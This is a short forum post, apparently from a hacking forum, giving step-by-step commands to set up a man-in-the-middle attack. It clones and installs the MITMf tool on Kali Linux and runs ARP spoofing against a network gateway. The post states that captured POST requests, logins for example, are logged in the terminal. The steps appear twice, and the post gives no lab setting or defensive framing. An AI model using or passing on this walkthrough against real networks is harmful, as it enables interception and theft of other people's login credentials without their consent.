OP 08 September, 2020 - 05:12 AM
Setting up an MITM machine.
1. Start Kali in your virtual machine
2. Become root and clone MITMF into root folder
3. Install dependencies
4. Run MITMf
POST requests (logins for example) will be logged in the terminal.
If you want to stop this attack, press CTRL+C once.
Leave your thoughts in comments.
1. Start Kali in your virtual machine
2. Become root and clone MITMF into root folder
Code:
su root
cd ~
git clone https://github.com/byt3bl33d3r/MITMf
3. Install dependencies
Code:
apt update
apt-get install python-dev python-setuptools libpcap0.8-dev
apt-get install libnetfilter-queue-dev libssl-dev libjpeg-dev
apt-get install libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
cd MITMf
git submodule init
git submodule update --recursive
pip install -r requirements.txt
4. Run MITMf
Code:
./mitmf.py -i <wifi interface> --spoof --arp --gateway <gateway IP>
POST requests (logins for example) will be logged in the terminal.
If you want to stop this attack, press CTRL+C once.
Leave your thoughts in comments.